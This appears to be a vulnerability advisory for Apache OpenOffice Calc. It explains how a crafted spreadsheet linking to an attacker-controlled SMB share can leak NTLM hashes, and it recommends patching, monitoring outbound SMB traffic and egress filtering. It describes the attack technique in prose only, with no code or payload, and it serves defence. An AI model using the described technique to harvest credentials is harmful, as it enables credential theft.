A high-severity vulnerability has been identified in Apache OpenOffice Calc that could allow an attacker to access sensitive information. By tricking a user into opening a specially crafted spreadsheet file, an attacker can force the application to connect to a malicious external location, potentially exposing user credentials or internal network data. Organizations using Apache OpenOffice should prioritize applying the available security updates to mitigate this risk.

This vulnerability exists in the way Apache OpenOffice Calc processes links to external data sources within a spreadsheet. An attacker can create a malicious spreadsheet file (.ods) containing a link to a remote, attacker-controlled resource (e.g., a malicious SMB share). When an unsuspecting user opens this file, Calc may attempt to resolve and connect to the external data source, which can lead to the disclosure of sensitive information, such as NTLM authentication hashes, without the user's explicit consent. This type of attack is typically delivered via phishing emails.

This is a High severity vulnerability with a CVSS score of 8.1, posing a significant risk to the organization. Successful exploitation could lead to the compromise of user credentials, which attackers can then use for initial access or lateral movement within the corporate network. The primary business impacts include the potential for a data breach, loss of confidential information, and unauthorized access to network resources. A successful attack could result in significant reputational damage and financial costs associated with incident response and recovery.

Immediate Action: The primary remediation is to apply the security updates provided by Apache across all affected systems immediately. Prioritize patching workstations where Apache OpenOffice is installed. After patching, continue to monitor systems for any signs of attempted exploitation by reviewing relevant logs for suspicious activity.

Proactive Monitoring: Security teams should monitor for unusual outbound network connections originating from the OpenOffice process (soffice.bin). Specifically, watch for outbound SMB traffic (TCP port 445) from workstations to external IP addresses, as this is a key indicator of an NTLM hash theft attempt. Review endpoint and firewall logs for connections to unknown or untrusted domains initiated after a user opens a spreadsheet document.

Compensating Controls: If immediate patching is not feasible, implement the following controls to reduce risk:

• Network Egress Filtering: Block outbound SMB traffic (TCP/445 and UDP/137-139) from user workstations to the internet at the network perimeter.
• User Awareness Training: Advise users to be cautious of opening unsolicited spreadsheet files from external sources and to never enable external content from an untrusted document.
• Endpoint Security: Ensure Endpoint Detection and Response (EDR) tools are configured to detect and alert on suspicious process behaviors, such as office productivity software making unexpected network connections.

Public Exploit Available: false

Given the high severity (CVSS 8.1) and the potential for credential theft, we recommend that organizations treat this vulnerability with urgency. The primary course of action is to apply the vendor-supplied patches to all systems running vulnerable versions of Apache OpenOffice immediately. Although this CVE is not currently on the CISA KEV list, its impact warrants immediate attention. In addition to patching, implementing compensating controls, such as blocking outbound SMB traffic, will provide a critical defense-in-depth layer against this and similar attack vectors.